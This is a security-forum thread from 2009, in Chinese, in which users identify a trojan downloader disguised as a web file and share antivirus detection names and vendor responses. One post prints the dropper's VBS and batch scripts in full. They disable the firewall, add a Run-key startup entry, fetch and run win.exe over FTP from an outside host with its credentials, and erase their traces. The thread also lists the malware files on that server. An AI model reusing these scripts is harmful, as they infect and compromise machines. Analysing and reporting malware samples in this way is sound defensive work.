貌似新病毒，过小a

板砖飞向我

伪装成IE网页文件  国产3巨头均没有发现，具体是不是病毒我也不太肯定

[ 本帖最后由 板砖飞向我 于 2009-6-5 12:52 编辑 ]

x_3max

Virus or unwanted program 'TR/Chifrax.A.983 [trojan]'

小红伞

sam.to

to kl

悠柚

D:\TDDownload\新建 WinRAR ZIP 压缩文件.zip/clcas.exe         已检测: Trojan.Win32.Chifrax!IK

nmygb

该文件为修改过的压缩文件，无法解压，属于脚本类木马下载者
该样本是一个利用bat和vbs的木马下载者
1.vbs内容 启动批处理wins.bat
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c wins.bat",vbhide

wins.bat 内容 停止系统防火墙，利用reg文件添加启动项，利用系统自带ftp下载木马
net stop sharedaccess
@copy clcas.exe c:\windows\system32\
@regedit /s clcas.reg
ping www.163.com|find "Reply from"
if %ERRORLEVEL%==0 goto ok
if %ERRORLEVEL%==1 goto end
:ok
@echo open 0120.2288.org>down.ini
@echo 123>>down.ini
@echo 123>>down.ini
@echo get win.exe>>down.ini
@echo bye>>down.ini
@ftp -s:down.ini
@win.exe
@del down.ini
@del 1.vbs
@del wins.bat
@exit
:end
ping www.163.com|find "Reply from"
if %ERRORLEVEL%==0 goto ok
if %ERRORLEVEL%==1 goto end

clcas.reg内容 添加系统启动项
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"clcas"="C:\\WINDOWS\\system32\\clcas.exe"

ftp://ftp://0120.2288.org/    内容
名称          大小          修改时间
文件:1.exe         180 KB         2009-5-18         12:23:00
文件:210.51.173.249.rar         613 KB         2009-6-3         0:24:00
文件:393.exe         180 KB         2009-5-15         19:28:00
文件:5789.exe         189 KB         2009-5-4         21:29:00
6699                 2009-6-4         15:57:00
文件:6699.exe         181 KB         2009-6-4         16:03:00
文件:8582.exe         180 KB         2009-5-19         17:52:00
文件:PP2008.rar         3688 KB         2009-4-21         0:58:00
leon                 2009-6-1         0:16:00
文件:win.exe         181 KB         2009-6-3         14:06:00
文件:影片.rar         37719 KB         2009-4-21         1:12:00
文件:整理好的.rar         4799 KB         2009-4-29         15:58:00

发财了哈哈

JusT.Like

Last infection: bbs.kafan.cn
Infected with: Trojan.Generic.1758371

sam.to

Hello,


clcas.ex2e - Trojan-GameThief.Win32.OnLineGames.bmeh

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.
The answer is relevant to the latest bases from update sources.

sam.to

原帖由 J-F-F 于 2009-6-5 12:59 发表
ftp://0120.2288.org
user:123
psw:123

to kl
088c1e781cb23411660bbd1454fd7d95  5789.exe_
bfa269fc5d5c451b45a03a08c5ef811c  6699.exe_

Hello,

New malicious software was found in the attached file. Its detection will be included in the next update.
Thank you for your help.
Trojan.Win32.CDur.edk
Trojan.Win32.CDur.edl
>
>
Regards, Tatarinov Ivan
Virus Analyst

[ 本帖最后由 sam.to 于 2009-6-5 17:42 编辑 ]

taoyuan237

放上来

FTP的EXE这里都有
所以FTP就删除了哈

Palkia

已删除: 木马程序 Trojan-Spy.Win32.Delf.gbh        文件: F:\DL\1.exe//data0000
已删除: 木马程序 Trojan-Spy.Win32.Delf.gay        文件: F:\DL\393.exe//data0000